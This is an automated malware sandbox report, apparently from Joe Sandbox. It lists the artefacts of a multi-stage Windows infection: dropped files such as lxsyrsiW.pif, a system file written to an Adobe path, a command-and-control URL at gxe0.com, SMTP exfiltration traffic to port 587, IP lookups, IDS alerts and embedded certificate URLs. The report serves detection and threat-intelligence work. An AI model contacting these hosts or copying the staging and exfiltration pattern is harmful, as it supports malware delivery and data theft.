Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.2163239930.0000000021C78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2061821518.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062442463.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2163239930.0000000021C4F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2185356044.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020897000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000007.00000003.2161406305.0000000004E90000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02B15908

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 01217394h	12_2_01217188
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 012178DCh	12_2_01217688
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	12_2_01217E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 012178DCh	12_2_01217643
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	12_2_01217E58
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 4x nop then jmp 05B2BCBDh	18_2_05B2BA40

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://gxe0.com/yak/233_Wisrysxlfss

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B2E4B8 InternetCheckConnectionA,

4_2_02B2E4B8

Source: global traffic

TCP traffic: 192.168.2.5:49708 -> 51.195.88.199:587

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 198.252.105.91 198.252.105.91
Source: Joe Sandbox View	IP Address: 51.195.88.199 51.195.88.199

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49908

Source: global traffic

TCP traffic: 192.168.2.5:49708 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: gxe0.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz

Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2445989296.0000000005F52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2445989296.0000000005F52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s82.gocheapweb.com
Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2257244398.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: x.exe, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2185356044.0000000002985000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062442463.0000000002990000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020874000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2234539521.0000000021C30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2253826982.000000007FCEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2176035692.000000000095A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2235162223.0000000021E2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000A.00000000.2172730384.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 00000018.00000002.2312849494.0000000002BD2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000000.2295133769.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001C.00000002.2394647640.0000000002A62000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000000.2376277495.0000000000416000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.pmail.com
Source: neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: x.exe, 00000004.00000000.2059921926.0000000000401000.00000020.00000001.01000000.00000004.sdmp, x.exe, 00000004.00000002.2251749179.000000007F920000.00000004.00001000.00020000.00000000.sdmp, esentutl.exe, 00000008.00000003.2171156522.0000000005600000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002310000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yadelphi.ru
Source: x.exe, 00000004.00000000.2059921926.0000000000401000.00000020.00000001.01000000.00000004.sdmp, x.exe, 00000004.00000002.2251749179.000000007F920000.00000004.00001000.00020000.00000000.sdmp, esentutl.exe, 00000008.00000003.2171156522.0000000005600000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002310000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yadelphi.ruopen
Source: neworigin.exe, 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000D.00000002.2257244398.00000000047E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: neworigin.exe, 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
